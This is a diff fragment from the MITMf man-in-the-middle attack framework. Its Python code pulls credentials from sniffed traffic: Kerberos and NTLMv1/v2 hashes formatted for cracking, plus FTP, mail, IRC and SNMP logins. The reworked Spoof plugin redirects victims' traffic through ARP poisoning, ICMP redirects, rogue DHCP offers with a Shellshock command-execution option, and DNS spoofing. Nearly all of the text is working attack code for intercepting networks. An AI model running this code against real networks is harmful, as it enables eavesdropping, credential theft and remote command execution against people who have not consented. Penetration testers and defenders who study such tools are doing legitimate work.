except IndexError:
|
||||
return
|
||||
|
||||
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
|
||||
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
|
||||
HashLen = struct.unpack('<b',Data[50:51])[0]
|
||||
if HashLen == 54:
|
||||
Hash = Data[53:105]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[153:154])[0]
|
||||
Name = Data[154:154+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
|
||||
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
|
||||
HashLen = struct.unpack('<b',Data[47:48])[0]
|
||||
Hash = Data[48:48+HashLen]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
|
||||
Name = Data[HashLen+97:HashLen+97+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
|
||||
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
else:
|
||||
Hash = Data[48:100]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[148:149])[0]
|
||||
Name = Data[149:149+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
|
||||
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
def ParseMSKerbv5UDP(self, Data):
|
||||
'''
|
||||
Taken from Pcredz because I didn't want to spend the time doing this myself
|
||||
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
|
||||
Maybe replace this eventually with the kerberos python lib
|
||||
Parses Kerberosv5 hashes from packets
|
||||
'''
|
||||
try:
|
||||
MsgType = Data[17:18]
|
||||
EncType = Data[39:40]
|
||||
except IndexError:
|
||||
return
|
||||
|
||||
if MsgType == "\x0a" and EncType == "\x17":
|
||||
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
|
||||
HashLen = struct.unpack('<b',Data[41:42])[0]
|
||||
if HashLen == 54:
|
||||
Hash = Data[44:96]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[144:145])[0]
|
||||
Name = Data[145:145+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
|
||||
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
if HashLen == 53:
|
||||
Hash = Data[44:95]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[143:144])[0]
|
||||
Name = Data[144:144+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
|
||||
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
else:
|
||||
HashLen = struct.unpack('<b',Data[48:49])[0]
|
||||
Hash = Data[49:49+HashLen]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
|
||||
Name = Data[HashLen+98:HashLen+98+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
|
||||
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
def Decode_Ip_Packet(self, s):
|
||||
'''
|
||||
Taken from PCredz, solely to get Kerb parsing
|
||||
working until I have time to analyze Kerb pkts
|
||||
and figure out a simpler way
|
||||
Maybe use kerberos python lib
|
||||
'''
|
||||
d={}
|
||||
d['header_len']=ord(s[0]) & 0x0f
|
||||
d['data']=s[4*d['header_len']:]
|
||||
return d
|
||||
|
||||
def double_line_checker(self, full_load, count_str):
|
||||
'''
|
||||
Check if count_str shows up twice
|
||||
'''
|
||||
num = full_load.lower().count(count_str)
|
||||
if num > 1:
|
||||
lines = full_load.count('\r\n')
|
||||
if lines > 1:
|
||||
full_load = full_load.split('\r\n')[-2] # -1 is ''
|
||||
return full_load
|
||||
|
||||
def parse_ftp(self, full_load, dst_ip_port):
|
||||
'''
|
||||
Parse out FTP creds
|
||||
'''
|
||||
print_strs = []
|
||||
|
||||
# Sometimes FTP packets double up on the authentication lines
|
||||
# We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
|
||||
full_load = self.double_line_checker(full_load, 'USER')
|
||||
|
||||
# FTP and POP potentially use idential client > server auth pkts
|
||||
ftp_user = re.match(self.ftp_user_re, full_load)
|
||||
ftp_pass = re.match(self.ftp_pw_re, full_load)
|
||||
|
||||
if ftp_user:
|
||||
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
|
||||
print_strs.append(msg1)
|
||||
if dst_ip_port[-3:] != ':21':
|
||||
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
|
||||
print_strs.append(msg2)
|
||||
|
||||
elif ftp_pass:
|
||||
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
|
||||
print_strs.append(msg1)
|
||||
if dst_ip_port[-3:] != ':21':
|
||||
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
|
||||
print_strs.append(msg2)
|
||||
|
||||
return print_strs
|
||||
|
||||
def mail_decode(self, src_ip_port, dst_ip_port, mail_creds):
|
||||
'''
|
||||
Decode base64 mail creds
|
||||
'''
|
||||
try:
|
||||
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
|
||||
decoded = decoded.replace('\x00', ' ')
|
||||
except TypeError:
|
||||
decoded = None
|
||||
except UnicodeDecodeError as e:
|
||||
decoded = None
|
||||
|
||||
if decoded != None:
|
||||
msg = 'Decoded: %s' % decoded
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
|
||||
def mail_logins(self, full_load, src_ip_port, dst_ip_port, ack, seq):
|
||||
'''
|
||||
Catch IMAP, POP, and SMTP logins
|
||||
'''
|
||||
# Handle the first packet of mail authentication
|
||||
# if the creds aren't in the first packet, save it in mail_auths
|
||||
|
||||
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
|
||||
|
||||
found = False
|
||||
|
||||
# Sometimes mail packets double up on the authentication lines
|
||||
# We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
|
||||
full_load = self.double_line_checker(full_load, 'auth')
|
||||
|
||||
# Client to server 2nd+ pkt
|
||||
if src_ip_port in self.mail_auths:
|
||||
if seq in self.mail_auths[src_ip_port][-1]:
|
||||
stripped = full_load.strip('\r\n')
|
||||
try:
|
||||
decoded = base64.b64decode(stripped)
|
||||
msg = 'Mail authentication: %s' % decoded
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
except TypeError:
|
||||
pass
|
||||
self.mail_auths[src_ip_port].append(ack)
|
||||
|
||||
# Server responses to client
|
||||
# seq always = last ack of tcp stream
|
||||
elif dst_ip_port in self.mail_auths:
|
||||
if seq in self.mail_auths[dst_ip_port][-1]:
|
||||
# Look for any kind of auth failure or success
|
||||
a_s = 'Authentication successful'
|
||||
a_f = 'Authentication failed'
|
||||
# SMTP auth was successful
|
||||
if full_load.startswith('235') and 'auth' in full_load.lower():
|
||||
# Reversed the dst and src
|
||||
self.printer(dst_ip_port, src_ip_port, a_s)
|
||||
found = True
|
||||
try:
|
||||
del self.mail_auths[dst_ip_port]
|
||||
except KeyError:
|
||||
pass
|
||||
# SMTP failed
|
||||
elif full_load.startswith('535 '):
|
||||
# Reversed the dst and src
|
||||
self.printer(dst_ip_port, src_ip_port, a_f)
|
||||
found = True
|
||||
try:
|
||||
del self.mail_auths[dst_ip_port]
|
||||
except KeyError:
|
||||
pass
|
||||
# IMAP/POP/SMTP failed
|
||||
elif ' fail' in full_load.lower():
|
||||
# Reversed the dst and src
|
||||
self.printer(dst_ip_port, src_ip_port, a_f)
|
||||
found = True
|
||||
try:
|
||||
del self.mail_auths[dst_ip_port]
|
||||
except KeyError:
|
||||
pass
|
||||
# IMAP auth success
|
||||
elif ' OK [' in full_load:
|
||||
# Reversed the dst and src
|
||||
self.printer(dst_ip_port, src_ip_port, a_s)
|
||||
found = True
|
||||
try:
|
||||
del self.mail_auths[dst_ip_port]
|
||||
except KeyError:
|
||||
pass
|
||||
|
||||
# Pkt was not an auth pass/fail so its just a normal server ack
|
||||
# that it got the client's first auth pkt
|
||||
else:
|
||||
if len(self.mail_auths) > 100:
|
||||
self.mail_auths.popitem(last=False)
|
||||
self.mail_auths[dst_ip_port].append(ack)
|
||||
|
||||
# Client to server but it's a new TCP seq
|
||||
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
|
||||
else:
|
||||
mail_auth_search = re.match(self.mail_auth_re, full_load, re.IGNORECASE)
|
||||
if mail_auth_search != None:
|
||||
auth_msg = full_load
|
||||
# IMAP uses the number at the beginning
|
||||
if mail_auth_search.group(1) != None:
|
||||
auth_msg = auth_msg.split()[1:]
|
||||
else:
|
||||
auth_msg = auth_msg.split()
|
||||
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
|
||||
# rather than just an AUTH PLAIN
|
||||
if len(auth_msg) > 2:
|
||||
mail_creds = ' '.join(auth_msg[2:])
|
||||
msg = 'Mail authentication: %s' % mail_creds
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
|
||||
self.mail_decode(src_ip_port, dst_ip_port, mail_creds)
|
||||
try:
|
||||
del self.mail_auths[src_ip_port]
|
||||
except KeyError:
|
||||
pass
|
||||
found = True
|
||||
|
||||
# Mail auth regex was found and src_ip_port is not in mail_auths
|
||||
# Pkt was just the initial auth cmd, next pkt from client will hold creds
|
||||
if len(self.mail_auths) > 100:
|
||||
self.mail_auths.popitem(last=False)
|
||||
self.mail_auths[src_ip_port] = [ack]
|
||||
|
||||
# At least 1 mail login style doesn't fit in the original regex:
|
||||
# 1 login "username" "password"
|
||||
# This also catches FTP authentication!
|
||||
# 230 Login successful.
|
||||
elif re.match(self.mail_auth_re1, full_load, re.IGNORECASE) != None:
|
||||
|
||||
# FTP authentication failures trigger this
|
||||
#if full_load.lower().startswith('530 login'):
|
||||
# return
|
||||
|
||||
auth_msg = full_load
|
||||
auth_msg = auth_msg.split()
|
||||
if 2 < len(auth_msg) < 5:
|
||||
mail_creds = ' '.join(auth_msg[2:])
|
||||
msg = 'Authentication: %s' % mail_creds
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
self.mail_decode(src_ip_port, dst_ip_port, mail_creds)
|
||||
found = True
|
||||
|
||||
if found == True:
|
||||
return True
|
||||
|
||||
def irc_logins(self, full_load):
|
||||
'''
|
||||
Find IRC logins
|
||||
'''
|
||||
user_search = re.match(self.irc_user_re, full_load)
|
||||
pass_search = re.match(self.irc_pw_re, full_load)
|
||||
if user_search:
|
||||
msg = 'IRC nick: %s' % user_search.group(1)
|
||||
return msg
|
||||
if pass_search:
|
||||
msg = 'IRC pass: %s' % pass_search.group(1)
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
return pass_search
|
||||
|
||||
def headers_to_dict(self, header_lines):
|
||||
'''
|
||||
Convert the list of header lines into a dictionary
|
||||
'''
|
||||
headers = {}
|
||||
# Incomprehensible list comprehension flattens list of headers
|
||||
# that are each split at ': '
|
||||
# http://stackoverflow.com/a/406296
|
||||
headers_list = [x for line in header_lines for x in line.split(': ', 1)]
|
||||
headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
|
||||
# Make the header key (like "Content-Length") lowercase
|
||||
for header in headers_dict:
|
||||
headers[header.lower()] = headers_dict[header]
|
||||
|
||||
return headers
|
||||
|
||||
def parse_http_load(self, full_load, http_methods):
|
||||
'''
|
||||
Split the raw load into list of headers and body string
|
||||
'''
|
||||
try:
|
||||
headers, body = full_load.split("\r\n\r\n", 1)
|
||||
except ValueError:
|
||||
headers = full_load
|
||||
body = ''
|
||||
header_lines = headers.split("\r\n")
|
||||
|
||||
# Pkts may just contain hex data and no headers in which case we'll
|
||||
# still want to parse them for usernames and password
|
||||
http_line = self.get_http_line(header_lines, http_methods)
|
||||
if not http_line:
|
||||
headers = ''
|
||||
body = full_load
|
||||
|
||||
header_lines = [line for line in header_lines if line != http_line]
|
||||
|
||||
return http_line, header_lines, body
|
||||
|
||||
def get_http_line(self, header_lines, http_methods):
|
||||
'''
|
||||
Get the header with the http command
|
||||
'''
|
||||
for header in header_lines:
|
||||
for method in http_methods:
|
||||
# / is the only char I can think of that's in every http_line
|
||||
# Shortest valid: "GET /", add check for "/"?
|
||||
if header.startswith(method):
|
||||
http_line = header
|
||||
return http_line
|
||||
|
||||
|
||||
def other_parser(self, src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
|
||||
|
||||
#For now we will parse the HTTP headers through scapy and not through Twisted
|
||||
#This will have to get changed in the future, seems a bit redundent
|
||||
http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
|
||||
http_line, header_lines, body = self.parse_http_load(full_load, http_methods)
|
||||
headers = self.headers_to_dict(header_lines)
|
||||
|
||||
# Kerberos over TCP
|
||||
decoded = self.Decode_Ip_Packet(str(pkt)[14:])
|
||||
kerb_hash = self.ParseMSKerbv5TCP(decoded['data'][20:])
|
||||
if kerb_hash:
|
||||
self.printer(src_ip_port, dst_ip_port, kerb_hash)
|
||||
|
||||
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
|
||||
NTLMSSP2 = re.search(self.NTLMSSP2_re, full_load, re.DOTALL)
|
||||
NTLMSSP3 = re.search(self.NTLMSSP3_re, full_load, re.DOTALL)
|
||||
if NTLMSSP2:
|
||||
self.parse_ntlm_chal(NTLMSSP2.group(), ack)
|
||||
if NTLMSSP3:
|
||||
ntlm_resp_found = self.parse_ntlm_resp(NTLMSSP3.group(), seq)
|
||||
if ntlm_resp_found != None:
|
||||
self.printer(src_ip_port, dst_ip_port, ntlm_resp_found)
|
||||
|
||||
# Look for authentication headers
|
||||
if len(headers) == 0:
|
||||
authenticate_header = None
|
||||
authorization_header = None
|
||||
for header in headers:
|
||||
authenticate_header = re.match(self.authenticate_re, header)
|
||||
authorization_header = re.match(self.authorization_re, header)
|
||||
if authenticate_header or authorization_header:
|
||||
break
|
||||
|
||||
if authorization_header or authenticate_header:
|
||||
# NETNTLM
|
||||
netntlm_found = self.parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
|
||||
if netntlm_found != None:
|
||||
self.printer(src_ip_port, dst_ip_port, netntlm_found)
|
||||
|
||||
def parse_netntlm(self, authenticate_header, authorization_header, headers, ack, seq):
|
||||
'''
|
||||
Parse NTLM hashes out
|
||||
'''
|
||||
# Type 2 challenge from server
|
||||
if authenticate_header != None:
|
||||
chal_header = authenticate_header.group()
|
||||
self.parse_netntlm_chal(headers, chal_header, ack)
|
||||
|
||||
# Type 3 response from client
|
||||
elif authorization_header != None:
|
||||
resp_header = authorization_header.group()
|
||||
msg = self.parse_netntlm_resp_msg(headers, resp_header, seq)
|
||||
if msg != None:
|
||||
return msg
|
||||
|
||||
def parse_snmp(self, src_ip_port, dst_ip_port, snmp_layer):
|
||||
'''
|
||||
Parse out the SNMP version and community string
|
||||
'''
|
||||
if type(snmp_layer.community.val) == str:
|
||||
ver = snmp_layer.version.val
|
||||
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
|
||||
self.printer(src_ip_port, dst_ip_port, msg)
|
||||
return True
|
||||
|
||||
def parse_netntlm_chal(self, headers, chal_header, ack):
|
||||
'''
|
||||
Parse the netntlm server challenge
|
||||
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
|
||||
'''
|
||||
header_val2 = headers[chal_header]
|
||||
header_val2 = header_val2.split(' ', 1)
|
||||
# The header value can either start with NTLM or Negotiate
|
||||
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
|
||||
msg2 = header_val2[1]
|
||||
msg2 = base64.decodestring(msg2)
|
||||
self.parse_ntlm_chal(ack, msg2)
|
||||
|
||||
def parse_ntlm_chal(self, msg2, ack):
|
||||
'''
|
||||
Parse server challenge
|
||||
'''
|
||||
|
||||
Signature = msg2[0:8]
|
||||
msg_type = struct.unpack("<I",msg2[8:12])[0]
|
||||
assert(msg_type==2)
|
||||
ServerChallenge = msg2[24:32].encode('hex')
|
||||
|
||||
# Keep the dict of ack:challenge to less than 50 chals
|
||||
if len(self.challenge_acks) > 50:
|
||||
self.challenge_acks.popitem(last=False)
|
||||
self.challenge_acks[ack] = ServerChallenge
|
||||
|
||||
def parse_netntlm_resp_msg(self, headers, resp_header, seq):
|
||||
'''
|
||||
Parse the client response to the challenge
|
||||
'''
|
||||
header_val3 = headers[resp_header]
|
||||
header_val3 = header_val3.split(' ', 1)
|
||||
|
||||
# The header value can either start with NTLM or Negotiate
|
||||
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
|
||||
msg3 = base64.decodestring(header_val3[1])
|
||||
return self.parse_ntlm_resp(msg3, seq)
|
||||
|
||||
def parse_ntlm_resp(self, msg3, seq):
|
||||
'''
|
||||
Parse the 3rd msg in NTLM handshake
|
||||
Thanks to psychomario
|
||||
'''
|
||||
|
||||
if seq in self.challenge_acks:
|
||||
challenge = self.challenge_acks[seq]
|
||||
else:
|
||||
challenge = 'CHALLENGE NOT FOUND'
|
||||
|
||||
if len(msg3) > 43:
|
||||
# Thx to psychomario for below
|
||||
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
|
||||
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
|
||||
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
|
||||
domain = msg3[domoff:domoff+domlen].replace("\0", "")
|
||||
user = msg3[useroff:useroff+userlen].replace("\0", "")
|
||||
# Original check by psychomario, might be incorrect?
|
||||
#if lmhash != "0"*48: #NTLMv1
|
||||
if ntlen == 24: #NTLMv1
|
||||
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
|
||||
return msg
|
||||
elif ntlen > 60: #NTLMv2
|
||||
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
|
||||
return msg
|
||||
|
||||
def printer(self, src_ip_port, dst_ip_port, msg):
|
||||
if dst_ip_port != None:
|
||||
print_str = '%s --> %s %s' % (src_ip_port, dst_ip_port,msg)
|
||||
# All credentials will have dst_ip_port, URLs will not
|
||||
mitmf_logger.info(print_str)
|
||||
else:
|
||||
print_str = '%s %s' % (src_ip_port.split(':')[0], msg)
|
||||
mitmf_logger.info(print_str)
|
165
plugins/Spoof.py
165
plugins/Spoof.py
|
@ -19,111 +19,122 @@
|
|||
#
|
||||
|
||||
import logging
|
||||
import sys
|
||||
|
||||
from sys import exit
|
||||
from core.utils import SystemConfig, IpTables
|
||||
from core.sslstrip.DnsCache import DnsCache
|
||||
from core.wrappers.protocols import _ARP, _DHCP, _ICMP
|
||||
from core.protocols.arp.ARPpoisoner import ARPpoisoner
|
||||
from core.protocols.arp.ARPWatch import ARPWatch
|
||||
from core.dnschef.DNSchef import DNSChef
|
||||
from core.protocols.dhcp.DHCPServer import DHCPServer
|
||||
from core.protocols.icmp.ICMPpoisoner import ICMPpoisoner
|
||||
from plugins.plugin import Plugin
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import *
|
||||
|
||||
class Spoof(Plugin):
|
||||
name = "Spoof"
|
||||
optname = "spoof"
|
||||
desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
|
||||
version = "0.6"
|
||||
has_opts = True
|
||||
name = "Spoof"
|
||||
optname = "spoof"
|
||||
desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
|
||||
tree_output = list()
|
||||
version = "0.6"
|
||||
has_opts = True
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.dnscfg = options.configfile['MITMf']['DNS']
|
||||
self.dhcpcfg = options.configfile['Spoof']['DHCP']
|
||||
self.target = options.target
|
||||
self.manualiptables = options.manualiptables
|
||||
self.protocolInstances = []
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.dnscfg = self.config['MITMf']['DNS']
|
||||
self.dhcpcfg = self.config['Spoof']['DHCP']
|
||||
self.targets = options.targets
|
||||
self.manualiptables = options.manualiptables
|
||||
self.mymac = SystemConfig.getMAC(options.interface)
|
||||
self.myip = SystemConfig.getIP(options.interface)
|
||||
self.protocolInstances = []
|
||||
|
||||
#Makes scapy more verbose
|
||||
debug = False
|
||||
if options.log_level is 'debug':
|
||||
debug = True
|
||||
#Makes scapy more verbose
|
||||
debug = False
|
||||
if options.log_level == 'debug':
|
||||
debug = True
|
||||
|
||||
if options.arp:
|
||||
if options.arp:
|
||||
|
||||
if not options.gateway:
|
||||
sys.exit("[-] --arp argument requires --gateway")
|
||||
if not options.gateway:
|
||||
exit("[-] --arp argument requires --gateway")
|
||||
|
||||
arp = _ARP(options.gateway, options.interface, options.mac_address)
|
||||
arp.target = options.target
|
||||
arp.arpmode = options.arpmode
|
||||
arp.debug = debug
|
||||
if options.targets is None:
|
||||
#if were poisoning whole subnet, start ARP-Watch
|
||||
arpwatch = ARPWatch(options.gateway, self.myip, options.interface)
|
||||
arpwatch.debug = debug
|
||||
|
||||
self.protocolInstances.append(arp)
|
||||
self.tree_output.append("ARPWatch online")
|
||||
self.protocolInstances.append(arpwatch)
|
||||
|
||||
elif options.icmp:
|
||||
arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets)
|
||||
arp.arpmode = options.arpmode
|
||||
arp.debug = debug
|
||||
|
||||
if not options.gateway:
|
||||
sys.exit("[-] --icmp argument requires --gateway")
|
||||
self.protocolInstances.append(arp)
|
||||
|
||||
if not options.target:
|
||||
sys.exit("[-] --icmp argument requires --target")
|
||||
|
||||
icmp = _ICMP(options.interface, options.target, options.gateway, options.ip_address)
|
||||
icmp.debug = debug
|
||||
elif options.icmp:
|
||||
|
||||
self.protocolInstances.append(icmp)
|
||||
if not options.gateway:
|
||||
exit("[-] --icmp argument requires --gateway")
|
||||
|
||||
elif options.dhcp:
|
||||
if not options.targets:
|
||||
exit("[-] --icmp argument requires --targets")
|
||||
|
||||
if options.target:
|
||||
sys.exit("[-] --target argument invalid when DCHP spoofing")
|
||||
icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, options.ip_address)
|
||||
icmp.debug = debug
|
||||
|
||||
dhcp = _DHCP(options.interface, self.dhcpcfg, options.ip_address, options.mac_address)
|
||||
dhcp.shellshock = options.shellshock
|
||||
dhcp.debug = debug
|
||||
self.protocolInstances.append(dhcp)
|
||||
self.protocolInstances.append(icmp)
|
||||
|
||||
if options.dns:
|
||||
elif options.dhcp:
|
||||
|
||||
if not options.manualiptables:
|
||||
if IpTables.getInstance().dns is False:
|
||||
IpTables.getInstance().DNS(options.ip_address, self.dnscfg['port'])
|
||||
if options.targets:
|
||||
exit("[-] --targets argument invalid when DCHP spoofing")
|
||||
|
||||
DNSChef.getInstance().loadRecords(self.dnscfg)
|
||||
dhcp = DHCPServer(options.interface, self.dhcpcfg, options.ip_address, options.mac_address)
|
||||
dhcp.shellshock = options.shellshock
|
||||
dhcp.debug = debug
|
||||
self.protocolInstances.append(dhcp)
|
||||
|
||||
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
||||
sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
|
||||
if options.dns:
|
||||
|
||||
SystemConfig.setIpForwarding(1)
|
||||
if not options.manualiptables:
|
||||
if IpTables.getInstance().dns is False:
|
||||
IpTables.getInstance().DNS(self.myip, self.dnscfg['port'])
|
||||
|
||||
if not options.manualiptables:
|
||||
if IpTables.getInstance().http is False:
|
||||
IpTables.getInstance().HTTP(options.listen)
|
||||
DNSChef.getInstance().loadRecords(self.dnscfg)
|
||||
|
||||
for protocol in self.protocolInstances:
|
||||
protocol.start()
|
||||
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
||||
exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
|
||||
|
||||
def add_options(self, options):
|
||||
group = options.add_mutually_exclusive_group(required=False)
|
||||
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
|
||||
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
||||
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries')
|
||||
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||
options.add_argument('--target', dest='target', default=None, help='Specify a host to poison [default: subnet]')
|
||||
options.add_argument('--arpmode',type=str, dest='arpmode', default='req', choices=["req", "rep"], help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
|
||||
#options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
|
||||
SystemConfig.setIpForwarding(1)
|
||||
|
||||
def finish(self):
|
||||
for protocol in self.protocolInstances:
|
||||
if hasattr(protocol, 'stop'):
|
||||
protocol.stop()
|
||||
if not options.manualiptables:
|
||||
IpTables.getInstance().Flush()
|
||||
if IpTables.getInstance().http is False:
|
||||
IpTables.getInstance().HTTP(options.listen)
|
||||
|
||||
if not self.manualiptables:
|
||||
IpTables.getInstance().Flush()
|
||||
for protocol in self.protocolInstances:
|
||||
protocol.start()
|
||||
|
||||
SystemConfig.setIpForwarding(0)
|
||||
def add_options(self, options):
|
||||
group = options.add_mutually_exclusive_group(required=False)
|
||||
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
|
||||
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
||||
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries')
|
||||
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||
options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]')
|
||||
options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
|
||||
|
||||
def finish(self):
|
||||
for protocol in self.protocolInstances:
|
||||
if hasattr(protocol, 'stop'):
|
||||
protocol.stop()
|
||||
|
||||
if not self.manualiptables:
|
||||
IpTables.getInstance().Flush()
|
||||
|
||||
SystemConfig.setIpForwarding(0)
|
||||
|
|
|
@ -23,8 +23,6 @@ from cStringIO import StringIO
|
|||
from plugins.plugin import Plugin
|
||||
from PIL import Image
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Upsidedownternet(Plugin):
|
||||
name = "Upsidedownternet"
|
||||
optname = "upsidedownternet"
|
||||
|
@ -65,7 +63,7 @@ class Upsidedownternet(Plugin):
|
|||
im.save(output, format=image_type)
|
||||
data = output.getvalue()
|
||||
output.close()
|
||||
mitmf_logger.info("%s Flipped image" % request.client.getClientIP())
|
||||
mitmf_logger.info("{} Flipped image".format(request.client.getClientIP()))
|
||||
except Exception as e:
|
||||
mitmf_logger.info("%s Error: %s" % (request.client.getClientIP(), e))
|
||||
mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e))
|
||||
return {'request': request, 'data': data}
|
||||
|
|
|
@ -3,4 +3,3 @@
|
|||
import os
|
||||
import glob
|
||||
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]
|
